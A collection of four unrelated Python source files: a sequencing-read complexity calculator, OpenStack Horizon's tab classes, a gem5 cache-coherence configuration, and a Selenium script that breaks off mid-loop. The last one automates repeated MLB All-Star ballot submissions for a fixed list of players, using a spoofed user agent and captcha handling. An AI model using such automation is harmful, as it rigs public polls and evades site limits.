# calculate percentages and append to list
self.__rgdict[rg]['list'].append((stepstring, str(uniq), '{0:.2f}'.format(uniq/float(rtstep)*100), str(newuniq), '{0:.2f}'.format(newuniq/float(self.__stepsize)*100)))
start, end = end, end+self.__stepsize # set start, end for the new subsample
def build_cigar(self, cigartuple):
cigstring = ''
for entry in cigartuple:
if entry[0] == 0:
cigstring = '{0}{1}M'.format(cigstring, entry[1])
elif entry[0] == 1:
cigstring = '{0}{1}I'.format(cigstring, entry[1])
elif entry[0] == 2:
cigstring = '{0}{1}D'.format(cigstring, entry[1])
elif entry[0] == 3:
cigstring = '{0}{1}N'.format(cigstring, entry[1])
elif entry[0] == 4:
cigstring = '{0}{1}S'.format(cigstring, entry[1])
elif entry[0] == 5:
cigstring = '{0}{1}H'.format(cigstring, entry[1])
elif entry[0] == 6:
cigstring = '{0}{1}P'.format(cigstring, entry[1])
elif entry[0] == 7:
cigstring = '{0}{1}='.format(cigstring, entry[1])
elif entry[0] == 8:
cigstring = '{0}{1}X'.format(cigstring, entry[1])
return cigstring
'''
method extracts the read tag RG of each entry and return 'none' if not set
@param readentry: pysam.AlignedSegment
@return: string
'''
def get_readtag(self, readentry):
try:
return readentry.get_tag('RG')
except KeyError:
return 'none'
'''
method checks if the cigar string starts with soft clip, either at the start or end;
it removes these and it builds a cigarstring
@param readentry: pysam.AlignedSegment
@return: string
'''
def prep_cigarstring(self, readentry):
if readentry.cigartuples[0][0] == 4 or readentry.cigartuples[-1][0] == 4:
cigred = readentry.cigartuples[::]
if cigred[0][0] == 4:
cigred = cigred[1:]
if cigred[-1][0] == 4:
cigred = cigred[:-1]
return self.build_cigar(cigred)
else:
return readentry.cigarstring
'''
method counts the values processed and aligned for the reads. it differs between
paired end and single end. for paired it only used the first read because fragments
are counted. return is TRUE if the readentry is second read or unmapped and returns
FALSE if the readentry is counted
@param readentry: pysam.AlignedSegment
@param readtag: RG tag of readentry
@return: TRUE or FALSE
'''
def count_samflagstat(self, readentry, readtag):
if readentry.is_paired:
if readentry.is_read1:
self.__rgdict[readtag]['processed'] += 1
if readentry.is_unmapped:
return True
self.__rgdict[readtag]['aligned'] += 1
else:
return True
else:
self.__rgdict[readtag]['processed'] += 1
if readentry.is_unmapped:
return True
self.__rgdict[readtag]['aligned'] += 1
return False
def parse_bwa(self):
processed = 0
for entry in self.__inputfile:
processed += 1
if processed % 2500000 == 0:
self.show_log('info', 'Reading {0:,} SAM records'.format(processed))
tag = self.get_readtag(entry)
# counts the processed and aligned stats per read entry and provides information
# (TRUE/FALSE) for the next step of data gathering
if self.count_samflagstat(entry, tag): continue
if entry.mapping_quality < 1: continue # not interested in multimapper
self.__rgdict[tag]['uniq'] += 1
cigarstring = self.prep_cigarstring(entry)
if entry.is_paired:
if self.__fragmode:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}-{4}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}'.format(entry.reference_id, entry.reference_start, cigarstring))
elif self.__complexity:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
else:
if self.__fragmode:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}'.format(entry.reference_id, entry.reference_start, cigarstring))
elif self.__complexity:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
self.show_log('info', '{0:,} SAM records processed'.format(processed))
def parse_gsnap(self):
processed = 0
for entry in self.__inputfile:
processed += 1
if processed % 2500000 == 0:
self.show_log('info', 'Reading {0:,} SAM records'.format(processed))
tag = self.get_readtag(entry)
# counts the processed and aligned stats per read entry and provides information
# (TRUE/FALSE) for the next step of data gathering
if self.count_samflagstat(entry, tag): continue
if entry.get_tag('NH') != 1: continue # not interested in multimapper
# maybe one should be interested?
self.__rgdict[tag]['uniq'] += 1
cigarstring = self.prep_cigarstring(entry)
if entry.is_paired:
if self.__fragmode:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}-{4}-{5}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD'), entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD')))
elif self.__complexity:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
else:
if self.__fragmode:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD')))
elif self.__complexity:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
self.show_log('info', '{0:,} SAM records processed'.format(processed))
def write_empties(self):
if self.__mappingstat and not isfile(self.__alignoutputfile):
temp = [self.__headermapping]
write_list(temp, self.__alignoutputfile, 'w')
chmod(self.__alignoutputfile, 0664)
if self.__complexity and not isfile(self.__complexoutputfile):
temp = [self.__headercomplex]
write_list(temp, self.__complexoutputfile, 'w')
chmod(self.__complexoutputfile, 0664)
def write_output(self, rg):
if self.__complexity and len(self.__rgdict[rg]['list']) != 0:
temp = []
self.show_log('info', 'Complexity Statistics for "{0}" are written to {1}'.format(rg, self.__complexoutputfile))
for entry in self.__rgdict[rg]['list']:
if self.__fragmode:
temp.append('\t'.join(entry) + '\t' + '\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Fragment', self.__aligner, self.__subset)) + '\n')
else:
temp.append('\t'.join(entry) + '\t' + '\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Position', self.__aligner, self.__subset)) + '\n')
write_list(temp, self.__complexoutputfile, 'a')
chmod(self.__complexoutputfile, 0664)
if self.__mappingstat:
temp = []
self.show_log('info', 'Mapping Statistics for "{0}" are written to {1}'.format(rg, self.__alignoutputfile))
total, mapped, uniq = self.__rgdict[rg]['processed'], self.__rgdict[rg]['aligned'], self.__rgdict[rg]['uniq']
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Total', str(total), '', '', self.__aligner, self.__subset)) + '\n')
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Mapped', str(mapped), '{0:.2f}'.format(mapped/float(total)*100), '{0:.0f}%'.format(mapped/float(total)*100), self.__aligner, self.__subset)) + '\n')
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Unique', str(uniq), '{0:.2f}'.format(uniq/float(total)*100), '{0:.0f}%'.format(uniq/float(total)*100), self.__aligner, self.__subset)) + '\n')
write_list(temp, self.__alignoutputfile, 'a')
chmod(self.__alignoutputfile, 0664)
def main(self):
if self.__aligner == 'gsnap':
self.parse_gsnap()
elif self.__aligner == 'bwa':
self.parse_bwa()
self.write_empties()
for rg in self.__rgdict:
coordlist = self.__rgdict[rg]['coordlist']
if self.__complexity and len(coordlist) != 0:
shuffle(coordlist)
self.show_log('info', 'Calculation Complexity for {0}'.format(rg))
self.calc_fragmentcomplexity(rg, self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], coordlist)
self.write_output(rg)
if __name__ == '__main__':
mainlog = MainLogger()
parser = Parser()
parser.main()
outputdir = add_Separator(pathjoin(parser.output, 'data'))
create_Directory(outputdir)
inst = CalcComplexity(parser.inputfile, outputdir, parser.bfx, parser.subsample, parser.frags, parser.mappingstats, parser.subset, parser.complexity)
inst.main()
mainlog.close()
logging.shutdown()
|
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import six
from django.template.loader import render_to_string
from django.template import TemplateSyntaxError # noqa
from django.utils.datastructures import SortedDict
from horizon_lib import exceptions
from horizon_lib.utils import html
SEPARATOR = "__"
CSS_TAB_GROUP_CLASSES = ["nav", "nav-tabs", "ajax-tabs"]
CSS_ACTIVE_TAB_CLASSES = ["active"]
CSS_DISABLED_TAB_CLASSES = ["disabled"]
class TabGroup(html.HTMLElement):
"""A container class which knows how to manage and render
:class:`~horizon_lib.tabs.Tab` objects.
.. attribute:: slug
The URL slug and pseudo-unique identifier for this tab group.
.. attribute:: template_name
The name of the template which will be used to render this tab group.
Default: ``"horizon_lib/common/_tab_group.html"``
.. attribute:: sticky
Boolean to control whether the active tab state should be stored
across requests for a given user. (State storage is all done
client-side.)
.. attribute:: param_name
The name of the GET request parameter which will be used when
requesting specific tab data. Default: ``tab``.
.. attribute:: classes
A list of CSS classes which should be displayed on this tab group.
.. attribute:: attrs
A dictionary of HTML attributes which should be rendered into the
markup for this tab group.
.. attribute:: selected
Read-only property which is set to the instance of the
currently-selected tab if there is one, otherwise ``None``.
.. attribute:: active
Read-only property which is set to the value of the current active tab.
This may not be the same as the value of ``selected`` if no
specific tab was requested via the ``GET`` parameter.
"""
slug = None
template_name = "horizon_lib/common/_tab_group.html"
param_name = 'tab'
sticky = False
_selected = None
_active = None
@property
def selected(self):
return self._selected
@property
def active(self):
return self._active
def __init__(self, request, **kwargs):
super(TabGroup, self).__init__()
if not hasattr(self, "tabs"):
raise NotImplementedError('%s must declare a "tabs" attribute.'
% self.__class__)
if not self.slug:
raise NotImplementedError('%s must declare a "slug" attribute.'
% self.__class__)
self.request = request
self.kwargs = kwargs
self._data = None
tab_instances = []
for tab in self.tabs:
tab_instances.append((tab.slug, tab(self, request)))
self._tabs = SortedDict(tab_instances)
if self.sticky:
self.attrs['data-sticky-tabs'] = 'sticky'
if not self._set_active_tab():
self.tabs_not_available()
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.slug)
def load_tab_data(self):
"""Preload all data that for the tabs that will be displayed."""
for tab in self._tabs.values():
if tab.load and not tab.data_loaded:
try:
tab._data = tab.get_context_data(self.request)
except Exception:
tab._data = False
exceptions.handle(self.request)
def get_id(self):
"""Returns the id for this tab group. Defaults to the value of the tab
group's :attr:`horizon_lib.tabs.Tab.slug`.
"""
return self.slug
def get_default_classes(self):
"""Returns a list of the default classes for the tab group. Defaults to
``["nav", "nav-tabs", "ajax-tabs"]``.
"""
default_classes = super(TabGroup, self).get_default_classes()
default_classes.extend(CSS_TAB_GROUP_CLASSES)
return default_classes
def tabs_not_available(self):
"""In the event that no tabs are either allowed or enabled, this method
is the fallback handler. By default it's a no-op, but it exists
to make redirecting or raising exceptions possible for subclasses.
"""
pass
def _set_active_tab(self):
marked_active = None
# See if we have a selected tab via the GET parameter.
tab = self.get_selected_tab()
if tab:
tab._active = True
self._active = tab
marked_active = tab
# Iterate through to mark them all accordingly.
for tab in self._tabs.values():
if tab._allowed and tab._enabled and not marked_active:
tab._active = True
self._active = tab
marked_active = True
elif tab == marked_active:
continue
else:
tab._active = False
return marked_active
def render(self):
"""Renders the HTML output for this tab group."""
return render_to_string(self.template_name, {"tab_group": self})
def get_tabs(self):
"""Returns a list of the allowed tabs for this tab group."""
return filter(lambda tab: tab._allowed, self._tabs.values())
def get_tab(self, tab_name, allow_disabled=False):
"""Returns a specific tab from this tab group.
If the tab is not allowed or not enabled this method returns ``None``.
If the tab is disabled but you wish to return it anyway, you can pass
``True`` to the allow_disabled argument.
"""
tab = self._tabs.get(tab_name, None)
if tab and tab._allowed and (tab._enabled or allow_disabled):
return tab
return None
def get_loaded_tabs(self):
return filter(lambda t: self.get_tab(t.slug), self._tabs.values())
def get_selected_tab(self):
"""Returns the tab specific by the GET request parameter.
In the event that there is no GET request parameter, the value
of the query parameter is invalid, or the tab is not allowed/enabled,
the return value of this function is None.
"""
selected = self.request.GET.get(self.param_name, None)
if selected:
try:
tab_group, tab_name = selected.split(SEPARATOR)
except ValueError:
return None
if tab_group == self.get_id():
self._selected = self.get_tab(tab_name)
return self._selected
class Tab(html.HTMLElement):
"""A reusable interface for constructing a tab within a
:class:`~horizon_lib.tabs.TabGroup`.
.. attribute:: name
The display name for the tab which will be rendered as the text for
the tab element in the HTML. Required.
.. attribute:: slug
The URL slug and id attribute for the tab. This should be unique for
a given tab group. Required.
.. attribute:: preload
Determines whether the contents of the tab should be rendered into
the page's HTML when the tab group is rendered, or whether it should
be loaded dynamically when the tab is selected. Default: ``True``.
.. attribute:: classes
A list of CSS classes which should be displayed on this tab.
.. attribute:: attrs
A dictionary of HTML attributes which should be rendered into the
markup for this tab.
.. attribute:: load
Read-only access to determine whether or not this tab's data should
be loaded immediately.
.. attribute:: permissions
A list of permission names which this tab requires in order to be
displayed. Defaults to an empty list (``[]``).
"""
name = None
slug = None
preload = True
_active = None
permissions = []
def __init__(self, tab_group, request=None):
super(Tab, self).__init__()
# Priority: constructor, class-defined, fallback
if not self.name:
raise ValueError("%s must have a name." % self.__class__.__name__)
self.name = unicode(self.name) # Force unicode.
if not self.slug:
raise ValueError("%s must have a slug." % self.__class__.__name__)
self.tab_group = tab_group
self.request = request
if request:
self._allowed = self.allowed(request) and (
self._has_permissions(request))
self._enabled = self.enabled(request)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.slug)
def _has_permissions(self, request):
return request.user.has_perms(self.permissions)
def is_active(self):
"""Method to access whether or not this tab is the active tab."""
if self._active is None:
self.tab_group._set_active_tab()
return self._active
@property
def load(self):
load_preloaded = self.preload or self.is_active()
return load_preloaded and self._allowed and self._enabled
@property
def data(self):
if getattr(self, "_data", None) is None:
self._data = self.get_context_data(self.request)
return self._data
@property
def data_loaded(self):
return getattr(self, "_data", None) is not None
def render(self):
"""Renders the tab to HTML using the
:meth:`~horizon_lib.tabs.Tab.get_context_data` method and
the :meth:`~horizon_lib.tabs.Tab.get_template_name` method.
If :attr:`~horizon_lib.tabs.Tab.preload` is ``False`` and
``force_load`` is not ``True``, or either
:meth:`~horizon_lib.tabs.Tab.allowed` or
:meth:`~horizon_lib.tabs.Tab.enabled` returns ``False`` this
method will return an empty string.
"""
if not self.load:
return ''
try:
context = self.data
except exceptions.Http302:
raise
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
raise six.reraise(TemplateSyntaxError, exc_value, exc_traceback)
return render_to_string(self.get_template_name(self.request), context)
def get_id(self):
"""Returns the id for this tab. Defaults to
``"{{ tab_group.slug }}__{{ tab.slug }}"``.
"""
return SEPARATOR.join([self.tab_group.slug, self.slug])
def get_query_string(self):
return "=".join((self.tab_group.param_name, self.get_id()))
def get_default_classes(self):
"""Returns a list of the default classes for the tab. Defaults to
and empty list (``[]``), however additional classes may be added
depending on the state of the tab as follows:
If the tab is the active tab for the tab group, in which
the class ``"active"`` will be added.
If the tab is not enabled, the classes the class ``"disabled"``
will be added.
"""
default_classes = super(Tab, self).get_default_classes()
if self.is_active():
default_classes.extend(CSS_ACTIVE_TAB_CLASSES)
if not self._enabled:
default_classes.extend(CSS_DISABLED_TAB_CLASSES)
return default_classes
def get_template_name(self, request):
"""Returns the name of the template to be used for rendering this tab.
By default it returns the value of the ``template_name`` attribute
on the ``Tab`` class.
"""
if not hasattr(self, "template_name"):
raise AttributeError("%s must have a template_name attribute or "
"override the get_template_name method."
% self.__class__.__name__)
return self.template_name
def get_context_data(self, request, **kwargs):
"""This method should return a dictionary of context data used to
render the tab. Required.
"""
return kwargs
def enabled(self, request):
"""Determines whether or not the tab should be accessible
(e.g. be rendered into the HTML on load and respond to a click event).
If a tab returns ``False`` from ``enabled`` it will ignore the value
of ``preload`` and only render the HTML of the tab after being clicked.
The default behavior is to return ``True`` for all cases.
"""
return True
def allowed(self, request):
"""Determines whether or not the tab is displayed.
Tab instances can override this method to specify conditions under
which this tab should not be shown at all by returning ``False``.
The default behavior is to return ``True`` for all cases.
"""
return True
def post(self, request, *args, **kwargs):
"""Handles POST data sent to a tab.
Tab instances can override this method to have tab-specific POST logic
without polluting the TabView code.
The default behavior is to ignore POST data.
"""
pass
class TableTab(Tab):
"""A :class:`~horizon_lib.tabs.Tab` class which knows how to deal with
:class:`~horizon_lib.tables.DataTable` classes rendered inside of it.
This distinct class is required due to the complexity involved in handling
both dynamic tab loading, dynamic table updating and table actions all
within one view.
.. attribute:: table_classes
An iterable containing the :class:`~horizon_lib.tables.DataTable`
classes which this tab will contain. Equivalent to the
:attr:`~horizon_lib.tables.MultiTableView.table_classes` attribute on
:class:`~horizon_lib.tables.MultiTableView`. For each table class you
need to define a corresponding ``get_{{ table_name }}_data`` method
as with :class:`~horizon_lib.tables.MultiTableView`.
"""
table_classes = None
def __init__(self, tab_group, request):
super(TableTab, self).__init__(tab_group, request)
if not self.table_classes:
class_name = self.__class__.__name__
raise NotImplementedError("You must define a table_class "
"attribute on %s" % class_name)
# Instantiate our table classes but don't assign data yet
table_instances = [(table._meta.name,
table(request, **tab_group.kwargs))
for table in self.table_classes]
self._tables = SortedDict(table_instances)
self._table_data_loaded = False
def load_table_data(self):
"""Calls the ``get_{{ table_name }}_data`` methods for each table class
and sets the data on the tables.
"""
# We only want the data to be loaded once, so we track if we have...
if not self._table_data_loaded:
for table_name, table in self._tables.items():
# Fetch the data function.
func_name = "get_%s_data" % table_name
data_func = getattr(self, func_name, None)
if data_func is None:
cls_name = self.__class__.__name__
raise NotImplementedError("You must define a %s method "
"on %s." % (func_name, cls_name))
# Load the data.
table.data = data_func()
table._meta.has_prev_data = self.has_prev_data(table)
table._meta.has_more_data = self.has_more_data(table)
# Mark our data as loaded so we don't run the loaders again.
self._table_data_loaded = True
def get_context_data(self, request, **kwargs):
"""Adds a ``{{ table_name }}_table`` item to the context for each table
in the :attr:`~horizon_lib.tabs.TableTab.table_classes` attribute.
If only one table class is provided, a shortcut ``table`` context
variable is also added containing the single table.
"""
context = super(TableTab, self).get_context_data(request, **kwargs)
# If the data hasn't been manually loaded before now,
# make certain it's loaded before setting the context.
self.load_table_data()
for table_name, table in self._tables.items():
# If there's only one table class, add a shortcut name as well.
if len(self.table_classes) == 1:
context["table"] = table
context["%s_table" % table_name] = table
return context
def has_prev_data(self, table):
return False
def has_more_data(self, table):
return False
|
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology
#
# Note: the L1 Cache latency is only used by the sequencer on fast path hits
#
class L1Cache(RubyCache):
latency = 2
#
# Note: the L2 Cache latency is not currently used
#
class L2Cache(RubyCache):
latency = 10
#
# Probe filter is a cache, latency is not used
#
class ProbeFilter(RubyCache):
latency = 1
def define_options(parser):
parser.add_option("--allow-atomic-migration", action="store_true",
help="allow migratory sharing for atomic only accessed blocks")
parser.add_option("--pf-on", action="store_true",
help="Hammer: enable Probe Filter")
parser.add_option("--dir-on", action="store_true",
help="Hammer: enable Full-bit Directory")
def create_system(options, system, piobus, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MOESI_hammer':
panic("This script requires the MOESI_hammer protocol to be built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes must be
# listed before the directory nodes and directory nodes before dma nodes, etc.
#
l1_cntrl_nodes = []
dir_cntrl_nodes = []
dma_cntrl_nodes = []
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
block_size_bits = int(math.log(options.cacheline_size, 2))
cntrl_count = 0
for i in xrange(options.num_cpus):
#
# First create the Ruby objects associated with this cpu
#
l1i_cache = L1Cache(size = options.l1i_size,
assoc = options.l1i_assoc,
start_index_bit = block_size_bits,
is_icache = True)
l1d_cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits)
l2_cache = L2Cache(size = options.l2_size,
assoc = options.l2_assoc,
start_index_bit = block_size_bits)
l1_cntrl = L1Cache_Controller(version = i,
cntrl_id = cntrl_count,
L1Icache = l1i_cache,
L1Dcache = l1d_cache,
L2cache = l2_cache,
no_mig_atomic = not \
options.allow_atomic_migration,
send_evictions = (
options.cpu_type == "detailed"),
ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i,
icache = l1i_cache,
dcache = l1d_cache,
ruby_system = ruby_system)
l1_cntrl.sequencer = cpu_seq
if piobus != None:
cpu_seq.pio_port = piobus.slave
if options.recycle_latency:
l1_cntrl.recycle_latency = options.recycle_latency
exec("ruby_system.l1_cntrl%d = l1_cntrl" % i)
#
# Add controllers and sequencers to the appropriate lists
#
cpu_sequencers.append(cpu_seq)
l1_cntrl_nodes.append(l1_cntrl)
cntrl_count += 1
phys_mem_size = sum(map(lambda mem: mem.range.size(),
system.memories.unproxy(system)))
assert(phys_mem_size % options.num_dirs == 0)
mem_module_size = phys_mem_size / options.num_dirs
#
# determine size and index bits for probe filter
# By default, the probe filter size is configured to be twice the
# size of the L2 cache.
#
pf_size = MemorySize(options.l2_size)
pf_size.value = pf_size.value * 2
dir_bits = int(math.log(options.num_dirs, 2))
pf_bits = int(math.log(pf_size.value, 2))
if options.numa_high_bit:
if options.pf_on or options.dir_on:
# if numa high bit explicitly set, make sure it does not overlap
# with the probe filter index
assert(options.numa_high_bit - dir_bits > pf_bits)
# set the probe filter start bit to just above the block offset
pf_start_bit = block_size_bits
else:
if dir_bits > 0:
pf_start_bit = dir_bits + block_size_bits - 1
else:
pf_start_bit = block_size_bits
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain=ruby_system.clk_domain,
clk_divider=3)
for i in xrange(options.num_dirs):
#
# Create the Ruby objects associated with the directory controller
#
mem_cntrl = RubyMemoryControl(
clk_domain = ruby_system.memctrl_clk_domain,
version = i,
ruby_system = ruby_system)
dir_size = MemorySize('0B')
dir_size.value = mem_module_size
pf = ProbeFilter(size = pf_size, assoc = 4,
start_index_bit = pf_start_bit)
dir_cntrl = Directory_Controller(version = i,
cntrl_id = cntrl_count,
directory = \
RubyDirectoryMemory( \
version = i,
size = dir_size,
use_map = options.use_map,
map_levels = \
options.map_levels,
numa_high_bit = \
options.numa_high_bit),
probeFilter = pf,
memBuffer = mem_cntrl,
probe_filter_enabled = options.pf_on,
full_bit_dir_enabled = options.dir_on,
ruby_system = ruby_system)
if options.recycle_latency:
dir_cntrl.recycle_latency = options.recycle_latency
exec("ruby_system.dir_cntrl%d = dir_cntrl" % i)
dir_cntrl_nodes.append(dir_cntrl)
cntrl_count += 1
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i,
ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
cntrl_id = cntrl_count,
dma_sequencer = dma_seq,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
if options.recycle_latency:
dma_cntrl.recycle_latency = options.recycle_latency
cntrl_count += 1
all_cntrls = l1_cntrl_nodes + dir_cntrl_nodes + dma_cntrl_nodes
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
|
|
#!/usr/bin/env python3
# Copyright (c) 2015 Andrew Ruder <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import readline
import re
import time
import sys
import tkinter as tk
import tkinter.ttk as ttk
import queue
import threading
from PIL import Image
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class ThreadedTask(threading.Thread):
def __init__(self, cont):
threading.Thread.__init__(self)
self.controller = cont
def run(self):
class ClickError(Exception):
pass
def ensure_switched(captcha):
broke = False
for i in range(0, 50):
try:
time.sleep(0.25)
captcha.click()
except:
broke = True
break
if not broke:
raise ClickError()
players = [
"Hosmer, E",
"Rizzo, A",
"Infante, O",
"La Stella, T",
"Escobar, A",
"Castro, S",
"Moustakas, M",
"Bryant, K",
"Perez, S",
"Montero, M",
"Morales, K",
"Cain, L",
"Gordon, A",
"Rios, A",
"Aoki, N",
"Coghlan, C",
"Fowler, D"
]
buttons = {}
while True:
dob = self.controller.prompt_question("DOB: ")
retest = re.match(r"""(\d{1,2})/(\d{1,2})/(\d{4})""", dob)
if retest:
dobmonth = int(retest.group(1), base=10)
dobday = int(retest.group(2), base=10)
dobyear = int(retest.group(3), base=10)
break
else:
self.controller.set_status("Expected format: MM/DD/YYYY")
time.sleep(2)
zipcode = self.controller.prompt_question("Zip: ")
while True:
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36"
browser = webdriver.PhantomJS(desired_capabilities=dcap)
browser.set_window_size(1900, 3000)
self.controller.set_status("Loading MLB All-Star page")
browser.get('http://www.mlb.com/mlb/events/all_star/y2015/ballot.jsp')
self.controller.set_status("Loaded")
email = self.controller.prompt_question("Email address: ")
self.controller.set_status("Voting for players")
for p in players:
self.controller.set_status("Voting for %s" % p)
xpath = '//*[text()[.="%s"]]/../../..//span[@class="selectBtn"]' % p
voted_xpath = '//div[@class="playerSelectedInfo"]/*[text()[.="Hosmer, E"]][@class="playerName"]'
WebDriverWait(browser, 20).until(EC.visibility_of_element_located((By.XPATH, xpath)))
voting_happened = False
while not voting_happened:
browser.find_element_by_xpath(xpath).click()
for i in range(0, 50):
try:
browser.find_element_by_xpath(voted_xpath)
voting_happened = True
break
except:
time.sleep(0.25)
self.controller.set_status("Clicking vote")
browser.find_element_by_id("vote-now").click()
registration = browser.find_element_by_id("register_vote")
# Fill in e-mail
self.controller.set_status("Filling out form")
registration.find_element_by_id("e").send_keys(email)
webdriver.support.select.Select(registration.find_element_by_id("bd_m")).select_by_value("%s" % dobmonth)
webdriver.support.select.Select(registration.find_element_by_id("bd_d")).select_by_value("%s" % dobday)
webdriver.support.select.Select(registration.find_element_by_id("bd_y")).select_by_value("%s" % dobyear)
registration.find_element_by_id("z").send_keys(zipcode)
webdriver.support.select.Select(registration.find_element_by_id("ft1")).select_by_value("kc")
spam = registration.find_element_by_id("on")
if spam.is_selected():
spam.click()
times = 0
while True:
